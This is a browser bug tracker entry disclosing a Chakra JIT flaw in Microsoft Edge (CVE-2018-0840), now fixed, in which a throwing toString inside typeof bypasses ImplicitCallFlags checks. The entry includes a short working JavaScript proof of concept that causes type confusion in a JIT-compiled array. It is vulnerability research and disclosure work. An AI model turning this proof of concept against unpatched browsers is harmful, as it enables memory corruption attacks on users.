New issue
Advanced search Search tips

Issue 1438 link

Starred by 3 users

Issue metadata

Status: Fixed
Owner:
Closed: Feb 2018
Cc:



Sign in to add a comment

Microsoft Edge: Chakra: JIT: ImplicitCallFlags checks bypass

Project Member Reported by lokihardt@google.com, Nov 23 2017

Issue description

Here's a snippet of ExecuteImplicitCall which is responsible for updating the ImplicitCallFlags flag.
    template <class Fn>
    inline Js::Var ExecuteImplicitCall(Js::RecyclableObject * function, Js::ImplicitCallFlags flags, Fn implicitCall)
    {
        ...
        Js::ImplicitCallFlags saveImplicitCallFlags = this->GetImplicitCallFlags();
        Js::Var result = implicitCall();
        this->SetImplicitCallFlags((Js::ImplicitCallFlags)(saveImplicitCallFlags | flags));
        return result;
    }

It updates the flag after the implicit call. So if an exception is thrown during the implicit call, the flag will remain not updated. And the execution will be broken until the exeception gets handled. Namely, if we can ignore the exception in any way, we can bypass the ImplicitCallFlags checks.

At this point, "typeof" comes to rescue. The weird handler for "typeof" catchs execptions and clears them. For example, in the following code, the exeception thrown from toString will be ignored.

let o = {
    toString: () => {
        throw 1;
    }
};

typeof(this[o]);

So, we can bypass the ImplicitCallFlags checks by throwing an exception and clearing it using "typeof".
function opt(arr, index) {
    arr[0] = 1.1;
    typeof(arr[index]);
    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1, 2.2, 3.3];
    for (let i = 0; i < 0x10000; i++) {
        opt(arr, {});
    }

    opt(arr, {toString: () => {
        arr[0] = {};

        throw 1;
    }});

    print(arr[0]);
}

main();


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 
Project Member

Comment 1 by lokihardt@google.com, Feb 14 2018

Labels: MSRC-42345 CVE-2018-0840
Status: Fixed (was: New)
Project Member

Comment 2 by lokihardt@google.com, Feb 14 2018

Labels: -Restrict-View-Commit

Sign in to add a comment